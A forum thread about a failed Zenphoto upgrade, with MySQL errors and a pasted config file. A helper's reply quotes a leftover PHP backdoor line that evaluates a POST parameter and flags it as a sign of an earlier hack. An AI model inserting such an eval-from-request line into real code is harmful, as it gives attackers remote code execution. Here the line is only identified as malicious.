upgrade to 1.4.4 problems

Hi, I tried to upgrade my zenphoto install (http://zenphoto.pwilkinson.net/) from 1.4.1 to 1.4.4 today but have encountered problems. It was working fine before.

You can see the errors from the setup page, but here they are:
MySQL reported: Can't connect to local MySQL server through socket '/No-MySQL-hostname-was-specified' (2)

Fill in the information below and setup will attempt to update your configuration file.

Notice: Undefined index: mysql_prefix in /home/pwilkinson/zenphoto.pwilkinson.net/zp-core/setup/setup-sqlform.php on line 92

Notice: Undefined index: mysql_prefix in /home/pwilkinson/zenphoto.pwilkinson.net/zp-core/setup/setup-sqlform.php on line 95

I have checked all the parameters in the zp-data config file and they are all fine. I am able to log into mysql with them and have checked the prefix matches.

Here is a copy of the config info:
// Database Information (the most important part!)

$conf['mysql_user'] = "zen";
$conf['mysql_pass'] = "*******";
$conf['mysql_host'] = "mysql.pwilkinson.net";
$conf['mysql_database'] = "zen_pwilkinson_net";

// If you're sharing the database with other tables, use a prefix to be safe.
$conf['mysql_prefix'] = "zp_411169453614519_";

When it didn't work the first time I tried deleting the zp-core folder and the index folder and uploading again, but this has had no effect.

I'm on dreamhost if that matters.

Let me know if there's any more info that might be useful, and thanks in advance for any help anyone offers!


  • The config info you show is not correct for the current Zenphoto version. There should be a line for
    `$conf['db_software'] = 'MySQLi'; // preferred database` (or something similar)
    Generally if this line is not present Setup will insert it, so it is strange that it is missing.

    Also the line `eval($_POST[chr(89)]);//";` is bogus. Perhaps it is from the site being hacked.

    BUT if you remove the `zp-data` folder then everything should be updated to the proper current versions. Also you would have had to re-enter your MySQL credentials, so be sure you write them down.
  • Bingo, thanks!

    Did have a hack a while ago but thought I had cleared it all up.

    All sorted now though, will seek out the donate button!
Sign In or Register to comment.